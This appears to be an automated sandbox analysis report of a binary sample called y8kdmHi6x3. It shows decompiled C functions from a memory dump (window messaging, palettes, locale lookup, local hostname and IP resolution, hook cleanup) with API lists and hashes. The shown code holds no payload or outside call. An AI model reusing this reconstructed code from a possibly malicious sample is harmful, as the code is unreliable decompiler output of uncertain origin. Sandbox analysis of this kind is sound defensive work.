                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5343eef08e8d1dd02cbbfae1b5f1536b7b7bec594a8a1cd2160f538fd193b115
                                                    • Instruction ID: ccdcb766eb864ac881303502937fc5a84d080c6be124c079d60bb56e6bda1b55
                                                    • Opcode Fuzzy Hash: 5343eef08e8d1dd02cbbfae1b5f1536b7b7bec594a8a1cd2160f538fd193b115
                                                    • Instruction Fuzzy Hash: 7111D270EC521857FB60BEBA8806B5B378A5F41749F14042FBD119B782DA3CDC65829F
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E0045A390(void* __eax, void* __ecx, struct HWND__** __edx) {
                                                    				intOrPtr _t11;
                                                    				intOrPtr _t20;
                                                    				void* _t30;
                                                    				void* _t31;
                                                    				void* _t33;
                                                    				struct HWND__** _t34;
                                                    				struct HWND__* _t35;
                                                    				struct HWND__* _t36;
                                                    
                                                    				_t31 = __ecx;
                                                    				_t34 = __edx;
                                                    				_t33 = __eax;
                                                    				_t30 = 0;
                                                    				_t11 =  *((intOrPtr*)(__edx + 4));
                                                    				if(_t11 < 0x100 || _t11 > 0x108) {
                                                    					L16:
                                                    					return _t30;
                                                    				} else {
                                                    					_t35 = GetCapture();
                                                    					if(_t35 != 0) {
                                                    						if(GetWindowLongA(_t35, 0xfffffffa) ==  *0x49e668 && SendMessageA(_t35, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
                                                    							_t30 = 1;
                                                    						}
                                                    						goto L16;
                                                    					}
                                                    					_t36 =  *_t34;
                                                    					_t2 = _t33 + 0x44; // 0x0
                                                    					_t20 =  *_t2;
                                                    					if(_t20 == 0 || _t36 !=  *((intOrPtr*)(_t20 + 0x254))) {
                                                    						L7:
                                                    						if(L00437E5C(_t36, _t31) == 0 && _t36 != 0) {
                                                    							_t36 = GetParent(_t36);
                                                    							goto L7;
                                                    						}
                                                    						if(_t36 == 0) {
                                                    							_t36 =  *_t34;
                                                    						}
                                                    						goto L11;
                                                    					} else {
                                                    						_t36 = E00441704(_t20);
                                                    						L11:
                                                    						if(SendMessageA(_t36, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
                                                    							_t30 = 1;
                                                    						}
                                                    						goto L16;
                                                    					}
                                                    				}
			}

                                                    APIs
                                                    • GetCapture.USER32 ref: 0045A3B3
                                                    • SendMessageA.USER32(00000000,-0000BBEE,0049ABD1,?), ref: 0045A407
                                                    • GetWindowLongA.USER32 ref: 0045A417
                                                    • SendMessageA.USER32(00000000,-0000BBEE,0049ABD1,?), ref: 0045A436
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessageSend$CaptureLongWindow
                                                    • String ID:
                                                    • API String ID: 1158686931-0
                                                    • Opcode ID: 5b89e33d5f33cfaebd5b1cc37b20e9e534ad05d39b8e2e3f38a1a5aac5179a0b
                                                    • Instruction ID: 3b7db6bc04ec6c9b9a315d118ec06550147a56b28b89c41b1f9545d3d98f8dbc
                                                    • Opcode Fuzzy Hash: 5b89e33d5f33cfaebd5b1cc37b20e9e534ad05d39b8e2e3f38a1a5aac5179a0b
                                                    • Instruction Fuzzy Hash: 491193712042095F9620FA9DC884F1373CC9B15319B10453AFD59C3343EAACFC54826B
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 22%
                                                    			E00442F0C(void* __eax) {
                                                    				intOrPtr _v8;
                                                    				intOrPtr _v12;
                                                    				char _v16;
                                                    				intOrPtr* _t14;
                                                    				intOrPtr* _t17;
                                                    				intOrPtr _t19;
                                                    				intOrPtr* _t21;
                                                    				intOrPtr* _t26;
                                                    				intOrPtr _t37;
                                                    				void* _t39;
                                                    				intOrPtr _t47;
                                                    				void* _t49;
                                                    				void* _t51;
                                                    				intOrPtr _t52;
                                                    
                                                    				_t49 = _t51;
                                                    				_t52 = _t51 + 0xfffffff4;
                                                    				_t39 = __eax;
                                                    				if( *((short*)(__eax + 0x68)) == 0xffff) {
                                                    					return __eax;
                                                    				} else {
                                                    					_t14 =  *0x49d970; // 0x49e900
                                                    					_t17 =  *0x49d970; // 0x49e900
                                                    					_t19 =  *((intOrPtr*)( *_t17))(0xd,  *((intOrPtr*)( *_t14))(0xe, 1, 1, 1));
                                                    					_push(_t19);
                                                    					L0042C408();
                                                    					_v8 = _t19;
                                                    					_push(_t49);
                                                    					_push(0x442fcc);
                                                    					_push( *[fs:eax]);
                                                    					 *[fs:eax] = _t52;
                                                    					_t21 =  *0x49de0c; // 0x49ebbc
                                                    					E0042C440(_v8, E004586EC( *_t21,  *((short*)(__eax + 0x68))));
                                                    					_t26 =  *0x49de0c; // 0x49ebbc
                                                    					E0042C440(_v8, E004586EC( *_t26,  *((short*)(_t39 + 0x68))));
                                                    					_push(0);
                                                    					_push(0);
                                                    					_push(0);
                                                    					_push(_v8);
                                                    					L0042C48C();
                                                    					_push( &_v16);
                                                    					_push(0);
                                                    					L0042C49C();
                                                    					_push(_v12);
                                                    					_push(_v16);
                                                    					_push(1);
                                                    					_push(_v8);
                                                    					L0042C48C();
                                                    					_pop(_t47);
                                                    					 *[fs:eax] = _t47;
                                                    					_push(0x442fd3);
                                                    					_t37 = _v8;
                                                    					_push(_t37);
                                                    					L0042C410();
                                                    					return _t37;
                                                    				}
			}

                                                    APIs
                                                    • 739F1AB0.COMCTL32(00000000), ref: 00442F3E
                                                      • Part of subcall function 0042C440: 739F2140.COMCTL32(00439016,000000FF,00000000,00442F6E,00000000,00442FCC,?,00000000), ref: 0042C444
                                                    • 739F1680.COMCTL32(00439016,00000000,00000000,00000000,00000000,00442FCC,?,00000000), ref: 00442F92
                                                    • 739F1710.COMCTL32(00000000,?,00439016,00000000,00000000,00000000,00000000,00442FCC,?,00000000), ref: 00442F9D
                                                    • 739F1680.COMCTL32(00439016,00000001,?,00443035,00000000,?,00439016,00000000,00000000,00000000,00000000,00442FCC,?,00000000), ref: 00442FB0
                                                    • 739F1F60.COMCTL32(00439016,00442FD3,00443035,00000000,?,00439016,00000000,00000000,00000000,00000000,00442FCC,?,00000000), ref: 00442FC6
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: F1680$F1710F2140
                                                    • String ID:
                                                    • API String ID: 3528053765-0
                                                    • Opcode ID: dd8f6c6bef30573f89024d1b65c38e83719737ac9faca5af5380f6cb668c253e
                                                    • Instruction ID: 31acb13db4a7b61839ae31ff436912f2200b31873635aba84f9d8170318329f8
                                                    • Opcode Fuzzy Hash: dd8f6c6bef30573f89024d1b65c38e83719737ac9faca5af5380f6cb668c253e
                                                    • Instruction Fuzzy Hash: 8B216F74B04204AFEB10EBA9DCD2F6E73F8EB48704F900066F904DB291DAB9AD40C758
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 86%
                                                    			E00472C58(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                    				intOrPtr* _v8;
                                                    				char _v408;
                                                    				char _v412;
                                                    				char _v416;
                                                    				int _t30;
                                                    				char* _t38;
                                                    				signed int _t39;
                                                    				intOrPtr _t48;
                                                    				intOrPtr* _t53;
                                                    				intOrPtr _t55;
                                                    				void* _t56;
                                                    				void* _t58;
                                                    
                                                    				_v416 = 0;
                                                    				_v412 = 0;
                                                    				 *[fs:eax] = _t58 + 0xfffffe64;
                                                    				_t38 = E00408D24(0x104, __eflags);
                                                    				L00472BD0();
                                                    				_v8 = L00403BBC(1);
                                                    				 *((intOrPtr*)( *_v8 + 0x44))(0x101,  &_v408,  *[fs:eax], 0x472d31, _t58, __edi, __esi, __ebx, _t56);
                                                    				E00404BB8( &_v412, _t38);
                                                    				_t30 = gethostname(_t38, E00404C80(_v412));
                                                    				_push(_t38);
                                                    				L00472BC0();
                                                    				if(_t30 != 0) {
                                                    					_t55 =  *((intOrPtr*)(_t30 + 0xc));
                                                    					_t39 = 0;
                                                    					while(1) {
                                                    						_t53 =  *((intOrPtr*)(_t55 + _t39 * 4));
                                                    						if(_t53 == 0) {
                                                    							break;
                                                    						}
                                                    						L00472BB8();
                                                    						E00404BB8( &_v416, _t30);
                                                    						_t30 =  *((intOrPtr*)( *_v8 + 0x38))( *_t53);
                                                    						_t39 = _t39 + 1;
                                                    						__eflags = _t39;
                                                    					}
                                                    					L00472BD8();
                                                    				}
                                                    				_pop(_t48);
                                                    				 *[fs:eax] = _t48;
                                                    				_push(0x472d38);
                                                    				return E004049E4( &_v416, 2);
                                                    			}

                                                    APIs
                                                    • WSAStartup.WSOCK32(00000101,?,00000000,00472D31), ref: 00472C98
                                                    • gethostname.WSOCK32(00000000,00000000), ref: 00472CCE
                                                    • gethostbyname.WSOCK32(00000000,00000000,00000000), ref: 00472CD4
                                                    • inet_ntoa.WSOCK32(?,00000000,00000000,00000000), ref: 00472CE6
                                                    • WSACleanup.WSOCK32(?,00000000,00000000,00000000), ref: 00472D0E
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CleanupStartupgethostbynamegethostnameinet_ntoa
                                                    • String ID:
                                                    • API String ID: 348263315-0
                                                    • Opcode ID: f06fb68704c44451b8735ee50c57d78fe34c005703e9fb394dc065d854421570
                                                    • Instruction ID: f3059b0da6ec3e1b640db76434b3b8e2fe7969af481d0775728bf7a32dd752b6
                                                    • Opcode Fuzzy Hash: f06fb68704c44451b8735ee50c57d78fe34c005703e9fb394dc065d854421570
                                                    • Instruction Fuzzy Hash: A521C3706001049FD760EF31CD91ADAB7F8EF45304F5184FAA94CA7352DAB8AE418B98
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E0042A288(int __eax) {
                                                    				int _t21;
                                                    				signed int _t29;
                                                    				char _t34;
                                                    				int _t42;
                                                    				int _t43;
                                                    				struct HDC__* _t44;
                                                    				intOrPtr _t45;
                                                    
                                                    				_t21 = __eax;
                                                    				_t42 = __eax;
                                                    				_t45 =  *((intOrPtr*)(__eax + 0x28));
                                                    				if( *((char*)(__eax + 0x30)) == 0 &&  *(_t45 + 0x10) == 0 &&  *((intOrPtr*)(_t45 + 0x14)) != 0) {
                                                    					_t22 =  *((intOrPtr*)(_t45 + 0x14));
                                                    					if( *((intOrPtr*)(_t45 + 0x14)) ==  *((intOrPtr*)(_t45 + 8))) {
                                                    						E00428BFC(_t22);
                                                    					}
                                                    					_t21 = E00426750( *((intOrPtr*)(_t45 + 0x14)), 1 <<  *(_t45 + 0x3e));
                                                    					_t43 = _t21;
                                                    					 *(_t45 + 0x10) = _t43;
                                                    					if(_t43 == 0) {
                                                    						_t44 = E00426060(GetDC(0));
                                                    						if( *((char*)(_t45 + 0x71)) != 0) {
                                                    							L9:
                                                    							_t34 = 1;
                                                    						} else {
                                                    							_t29 = GetDeviceCaps(_t44, 0xc);
                                                    							if(_t29 * GetDeviceCaps(_t44, 0xe) < ( *(_t45 + 0x2a) & 0x0000ffff) * ( *(_t45 + 0x28) & 0x0000ffff)) {
                                                    								goto L9;
                                                    							} else {
                                                    								_t34 = 0;
                                                    							}
                                                    						}
                                                    						 *((char*)(_t45 + 0x71)) = _t34;
                                                    						if(_t34 != 0) {
                                                    							 *(_t45 + 0x10) = CreateHalftonePalette(_t44);
                                                    						}
                                                    						_t21 = ReleaseDC(0, _t44);
                                                    						if( *(_t45 + 0x10) == 0) {
                                                    							 *((char*)(_t42 + 0x30)) = 1;
                                                    							return _t21;
                                                    						}
                                                    					}
                                                    				}
                                                    				return _t21;
                                                    			}

                                                    APIs
                                                    • GetDC.USER32(00000000), ref: 0042A2DE
                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0042A2F3
                                                    • GetDeviceCaps.GDI32(00000000,0000000E), ref: 0042A2FD
                                                    • CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A321
                                                    • ReleaseDC.USER32 ref: 0042A32C
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CapsDevice$CreateHalftonePaletteRelease
                                                    • String ID:
                                                    • API String ID: 2404249990-0
                                                    • Opcode ID: e67643a24833364483348e8498fc212bf2f1e615a4c10726663e597d674b9aa6
                                                    • Instruction ID: a69a9921d942d4c2fc4b887ba219ee821ce262c4093934c48757552ca675d17f
                                                    • Opcode Fuzzy Hash: e67643a24833364483348e8498fc212bf2f1e615a4c10726663e597d674b9aa6
                                                    • Instruction Fuzzy Hash: E211B4217092699BEB20EF25A4457EF3690AB10359F84012AFD0097281D7BC9CA5C3EA
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 70%
                                                    			E004266B8(void* __eax) {
                                                    				char _v5;
                                                    				struct HDC__* _v12;
                                                    				struct HPALETTE__* _t21;
                                                    				struct HPALETTE__* _t25;
                                                    				void* _t28;
                                                    				intOrPtr _t35;
                                                    				void* _t37;
                                                    				void* _t39;
                                                    				intOrPtr _t40;
                                                    
                                                    				_t37 = _t39;
                                                    				_t40 = _t39 + 0xfffffff8;
                                                    				_t28 = __eax;
                                                    				_v5 = 0;
                                                    				if( *0x49e894 == 0) {
                                                    					return _v5;
                                                    				} else {
                                                    					_v12 = GetDC(0);
                                                    					_push(_t37);
                                                    					_push(0x42673e);
                                                    					_push( *[fs:edx]);
                                                    					 *[fs:edx] = _t40;
                                                    					if(GetDeviceCaps(_v12, 0x68) >= 0x10) {
                                                    						_t21 =  *0x49e894; // 0x5e0807a3
                                                    						GetPaletteEntries(_t21, 0, 8, _t28 + 4);
                                                    						_t25 =  *0x49e894; // 0x5e0807a3
                                                    						GetPaletteEntries(_t25, 8, 8, _t28 + ( *(_t28 + 2) & 0x0000ffff) * 4 - 0x1c);
                                                    						_v5 = 1;
                                                    					}
                                                    					_pop(_t35);
                                                    					 *[fs:eax] = _t35;
                                                    					_push(0x426745);
                                                    					return ReleaseDC(0, _v12);
                                                    				}
                                                    			}

                                                    APIs
                                                    • GetDC.USER32(00000000), ref: 004266D0
                                                    • GetDeviceCaps.GDI32(?,00000068), ref: 004266EC
                                                    • GetPaletteEntries.GDI32(5E0807A3,00000000,00000008,?), ref: 00426704
                                                    • GetPaletteEntries.GDI32(5E0807A3,00000008,00000008,?), ref: 0042671C
                                                    • ReleaseDC.USER32 ref: 00426738
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: EntriesPalette$CapsDeviceRelease
                                                    • String ID:
                                                    • API String ID: 3128150645-0
                                                    • Opcode ID: b008b661d38c4f5ea8a9daaf1a5d07ce1dbb277d7a802cc1eb5a05b65464a69b
                                                    • Instruction ID: c0b5c4fbf9d89d63b7e1562d2f304591e56de7434d42fe68f424cbdc017dfa0b
                                                    • Opcode Fuzzy Hash: b008b661d38c4f5ea8a9daaf1a5d07ce1dbb277d7a802cc1eb5a05b65464a69b
                                                    • Instruction Fuzzy Hash: 1B11A531A483047EFB41DBE5AC86F6D7BA8E745718F94806BFA04AA1C1D97A6404C729
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 64%
                                                    			E0040CBEC(void* __esi, void* __eflags) {
                                                    				char _v8;
                                                    				intOrPtr* _t18;
                                                    				intOrPtr _t26;
                                                    				void* _t27;
                                                    				long _t29;
                                                    				intOrPtr _t32;
                                                    				void* _t33;
                                                    
                                                    				_t33 = __eflags;
                                                    				_push(0);
                                                    				_push(_t32);
                                                    				_push(0x40cc83);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t32;
                                                    				E0040C964(GetThreadLocale(), 0x40cc98, 0x100b,  &_v8);
                                                    				_t29 = E00409664(0x40cc98, 1, _t33);
                                                    				if(_t29 + 0xfffffffd - 3 < 0) {
                                                    					EnumCalendarInfoA(E0040CB38, GetThreadLocale(), _t29, 4);
                                                    					_t27 = 7;
                                                    					_t18 = 0x49e770;
                                                    					do {
                                                    						 *_t18 = 0xffffffff;
                                                    						_t18 = _t18 + 4;
                                                    						_t27 = _t27 - 1;
                                                    					} while (_t27 != 0);
                                                    					EnumCalendarInfoA(E0040CB74, GetThreadLocale(), _t29, 3);
                                                    				}
                                                    				_pop(_t26);
                                                    				 *[fs:eax] = _t26;
                                                    				_push(E0040CC8A);
                                                    				return E004049C0( &_v8);
                                                    			}

                                                    APIs
                                                    • GetThreadLocale.KERNEL32(?,00000000,0040CC83,?,?,00000000), ref: 0040CC04
                                                      • Part of subcall function 0040C964: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040C982
                                                    • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040CC83,?,?,00000000), ref: 0040CC34
                                                    • EnumCalendarInfoA.KERNEL32(Function_0000CB38,00000000,00000000,00000004), ref: 0040CC3F
                                                    • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040CC83,?,?,00000000), ref: 0040CC5D
                                                    • EnumCalendarInfoA.KERNEL32(Function_0000CB74,00000000,00000000,00000003), ref: 0040CC68
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Locale$InfoThread$CalendarEnum
                                                    • String ID:
                                                    • API String ID: 4102113445-0
                                                    • Opcode ID: 902988a0099969183d8a3a73948f8a6bf1cf9f07a1a6714f5175c9c2e886427b
                                                    • Instruction ID: 1afeb0ae3c984d7c4f1a7fc68b04595db4598325ea28b3ac7f3617db3f710194
                                                    • Opcode Fuzzy Hash: 902988a0099969183d8a3a73948f8a6bf1cf9f07a1a6714f5175c9c2e886427b
                                                    • Instruction Fuzzy Hash: 70014270608204EBF701A7B5DD43F5E725CDB46B18F610737B900BA2C0D63CAE00826D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00458FB8() {
                                                    				void* _t2;
                                                    				void* _t5;
                                                    				void* _t8;
                                                    				struct HHOOK__* _t10;
                                                    
                                                    				if( *0x49ebd0 != 0) {
                                                    					_t10 =  *0x49ebd0; // 0x0
                                                    					UnhookWindowsHookEx(_t10);
                                                    				}
                                                    				 *0x49ebd0 = 0;
                                                    				if( *0x49ebd4 != 0) {
                                                    					_t2 =  *0x49ebcc; // 0x0
                                                    					SetEvent(_t2);
                                                    					if(GetCurrentThreadId() !=  *0x49ebc8) {
                                                    						_t8 =  *0x49ebd4; // 0x0
                                                    						WaitForSingleObject(_t8, 0xffffffff);
                                                    					}
                                                    					_t5 =  *0x49ebd4; // 0x0
                                                    					CloseHandle(_t5);
                                                    					 *0x49ebd4 = 0;
                                                    					return 0;
                                                    				}
                                                    				return 0;
                                                    			}
                                                    0x00458fbf
                                                    0x00458fc1
                                                    0x00458fc7
                                                    0x00458fc7
                                                    0x00458fce
                                                    0x00458fda
                                                    0x00458fdc
                                                    0x00458fe2
                                                    0x00458ff2
                                                    0x00458ff6
                                                    0x00458ffc
                                                    0x00458ffc
                                                    0x00459001
                                                    0x00459007
                                                    0x0045900e
                                                    0x00000000
                                                    0x0045900e
                                                    0x00459013

                                                    APIs
                                                    • UnhookWindowsHookEx.USER32(00000000), ref: 00458FC7
                                                    • SetEvent.KERNEL32(00000000,0045B3C6,00000000,0045A473,?,?,0049ABD1,00000001,0045A533,?,?,?,0049ABD1), ref: 00458FE2
                                                    • GetCurrentThreadId.KERNEL32 ref: 00458FE7
                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0045B3C6,00000000,0045A473,?,?,0049ABD1,00000001,0045A533,?,?,?,0049ABD1), ref: 00458FFC
                                                    • CloseHandle.KERNEL32(00000000,00000000,0045B3C6,00000000,0045A473,?,?,0049ABD1,00000001,0045A533,?,?,?,0049ABD1), ref: 00459007
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseCurrentEventHandleHookObjectSingleThreadUnhookWaitWindows
                                                    • String ID:
                                                    • API String ID: 2429646606-0
                                                    • Opcode ID: 7fd3c2e6dc8ae750e94a7f2d7be103522667448ec58a17d1e6ff86980fbe391f
                                                    • Instruction ID: 3bc59d0302d60dcdb639d85b4c22765180d6681b902288d708a5b48c4f0846c4
                                                    • Opcode Fuzzy Hash: 7fd3c2e6dc8ae750e94a7f2d7be103522667448ec58a17d1e6ff86980fbe391f
                                                    • Instruction Fuzzy Hash: 9CF0ACB1905100EAC750EBBBED49A063395A724315F000A3BB112D71E1D73CF884CB1E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 84%
                                                    			E0045B640(char __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                    				char _v8;
                                                    				int _v12;
                                                    				char _v16;
                                                    				intOrPtr _v20;
                                                    				intOrPtr _v24;
                                                    				struct tagPOINT _v32;
                                                    				char _v33;
                                                    				intOrPtr _v40;
                                                    				char _v44;
                                                    				intOrPtr _v48;
                                                    				struct HWND__* _v52;
                                                    				intOrPtr _v56;
                                                    				char _v60;
                                                    				struct tagRECT _v76;
                                                    				intOrPtr _v80;
                                                    				intOrPtr _v84;
                                                    				int _v88;
                                                    				int _v92;
                                                    				intOrPtr _v96;
                                                    				char _v100;
                                                    				struct tagRECT _v116;
                                                    				char _v132;
                                                    				intOrPtr _v136;
                                                    				char _v140;
                                                    				char _v144;
                                                    				char _v148;
                                                    				struct HWND__* _t130;
                                                    				struct HWND__* _t166;
                                                    				intOrPtr _t188;
                                                    				char _t194;
                                                    				intOrPtr _t218;
                                                    				intOrPtr _t222;
                                                    				void* _t238;
                                                    				intOrPtr* _t250;
                                                    				intOrPtr _t270;
                                                    				intOrPtr _t271;
                                                    				intOrPtr _t273;
                                                    				intOrPtr _t279;
                                                    				intOrPtr* _t306;
                                                    				intOrPtr _t307;
                                                    				void* _t314;
                                                    
                                                    				_t313 = _t314;
                                                    				_push(__ebx);
                                                    				_push(__esi);
                                                    				_v144 = 0;
                                                    				_v148 = 0;
                                                    				asm("movsd");
                                                    				asm("movsd");
                                                    				_v8 = __eax;
                                                    				_t270 =  *0x451298; // 0x45129c
                                                    				E004053AC( &_v100, _t270);
                                                    				_t250 =  &_v8;
                                                    				_push(_t314);
                                                    				_push(0x45b9c6);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t314 + 0xffffff70;
                                                    				 *((char*)( *_t250 + 0x58)) = 0;
                                                    				if( *((char*)( *_t250 + 0x88)) == 0 ||  *((intOrPtr*)( *_t250 + 0x60)) == 0 || E004517CC() == 0 || E00458E30(E00439828( &_v16, 1)) !=  *((intOrPtr*)( *_t250 + 0x60))) {
                                                    					L23:
                                                    					_t130 = _v52;
                                                    					__eflags = _t130;
                                                    					if(_t130 <= 0) {
                                                    						E0045B3A8( *_t250);
                                                    					} else {
                                                    						E0045B1B0( *_t250, 0, _t130);
                                                    					}
                                                    					goto L26;
                                                    				} else {
                                                    					_v100 =  *((intOrPtr*)( *_t250 + 0x60));
                                                    					_v92 = _v16;
                                                    					_v88 = _v12;
                                                    					_v88 = _v88 + E0045B3E0();
                                                    					_v84 = E004581F4();
                                                    					_v80 =  *((intOrPtr*)( *_t250 + 0x5c));
                                                    					E0043A91C( *((intOrPtr*)( *_t250 + 0x60)),  &_v132);
                                                    					asm("movsd");
                                                    					asm("movsd");
                                                    					asm("movsd");
                                                    					asm("movsd");
                                                    					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x60)))) + 0x40))();
                                                    					_v32.x = 0;
                                                    					_v32.y = 0;
                                                    					_t306 =  *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x60)) + 0x30));
                                                    					_t320 = _t306;
                                                    					if(_t306 == 0) {
                                                    						_t307 =  *((intOrPtr*)( *_t250 + 0x60));
                                                    						_t279 =  *0x437498; // 0x4374e4
                                                    						_t166 = L00403D78(_t307, _t279);
                                                    						__eflags = _t166;
                                                    						if(_t166 != 0) {
                                                    							__eflags =  *(_t307 + 0x190);
                                                    							if( *(_t307 + 0x190) != 0) {
                                                    								ClientToScreen( *(_t307 + 0x190),  &_v32);
                                                    							}
                                                    						}
                                                    					} else {
                                                    						 *((intOrPtr*)( *_t306 + 0x40))();
                                                    					}
                                                    					OffsetRect( &_v76, _v32.x - _v24, _v32.y - _v20);
                                                    					E0043AAC0( *((intOrPtr*)( *_t250 + 0x60)),  &_v140,  &_v16);
                                                    					_v60 = _v140;
                                                    					_v56 = _v136;
                                                    					E00458DF8( *((intOrPtr*)( *_t250 + 0x60)),  &_v148);
                                                    					E0043809C(_v148,  &_v140,  &_v144, _t320);
                                                    					E00404A58( &_v44, _v144);
                                                    					_v52 = 0;
                                                    					_v48 =  *((intOrPtr*)( *_t250 + 0x74));
                                                    					_t188 =  *0x49be64; // 0x437a1c
                                                    					_v96 = _t188;
                                                    					_v40 = 0;
                                                    					_v33 = E0043C130( *((intOrPtr*)( *_t250 + 0x60)), 0, 0xb030,  &_v100) == 0;
                                                    					if(_v33 != 0 &&  *((short*)( *_t250 + 0x132)) != 0) {
                                                    						 *((intOrPtr*)( *_t250 + 0x130))( &_v100);
                                                    					}
                                                    					if(_v33 == 0 ||  *((intOrPtr*)( *_t250 + 0x60)) == 0) {
                                                    						_t194 = 0;
                                                    					} else {
                                                    						_t194 = 1;
                                                    					}
                                                    					_t285 =  *_t250;
                                                    					 *((char*)( *_t250 + 0x58)) = _t194;
                                                    					if( *((char*)( *_t250 + 0x58)) == 0) {
                                                    						goto L23;
                                                    					} else {
                                                    						_t327 = _v44;
                                                    						if(_v44 == 0) {
                                                    							goto L23;
                                                    						}
                                                    						E0045B534(_v96, _t285, _t313);
                                                    						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x84)))) + 0x70))();
                                                    						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x84)))) + 0xd8))( &_v116, _v40);
                                                    						OffsetRect( &_v116, _v92, _v88);
                                                    						if(L00403DE8( *((intOrPtr*)( *_t250 + 0x84)), _t327) != 0) {
                                                    							_t238 = E0045B594(_v44, _t250, 0xffc8, _t313) + 5;
                                                    							_v116.left = _v116.left - _t238;
                                                    							_v116.right = _v116.right - _t238;
                                                    						}
                                                    						E0043AA94( *((intOrPtr*)( *_t250 + 0x60)),  &_v140,  &_v76);
                                                    						_t218 =  *_t250;
                                                    						 *((intOrPtr*)(_t218 + 0x64)) = _v140;
                                                    						 *((intOrPtr*)(_t218 + 0x68)) = _v136;
                                                    						E0043AA94( *((intOrPtr*)( *_t250 + 0x60)),  &_v140,  &(_v76.right));
                                                    						_t222 =  *_t250;
                                                    						 *((intOrPtr*)(_t222 + 0x6c)) = _v140;
                                                    						 *((intOrPtr*)(_t222 + 0x70)) = _v136;
                                                    						E0043B11C( *((intOrPtr*)( *_t250 + 0x84)), _v80);
                                                    						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x84)))) + 0xd4))(_v40);
                                                    						E00458F44(_v44);
                                                    						_t231 = _v52;
                                                    						if(_v52 <= 0) {
                                                    							E0045B1B0( *_t250, 1, _v48);
                                                    						} else {
                                                    							E0045B1B0( *_t250, 0, _t231);
                                                    						}
                                                    						L26:
                                                    						_pop(_t271);
                                                    						 *[fs:eax] = _t271;
                                                    						_push(0x45b9cd);
                                                    						E004049E4( &_v148, 2);
                                                    						_t273 =  *0x451298; // 0x45129c
                                                    						return E0040547C( &_v100, _t273);
                                                    					}
                                                    				}
                                                    			}
                                                    0x0045b641
                                                    0x0045b649
                                                    0x0045b64a
                                                    0x0045b64e
                                                    0x0045b654
                                                    0x0045b65f
                                                    0x0045b660
                                                    0x0045b661
                                                    0x0045b667
                                                    0x0045b66d
                                                    0x0045b672
                                                    0x0045b677
                                                    0x0045b678
                                                    0x0045b67d
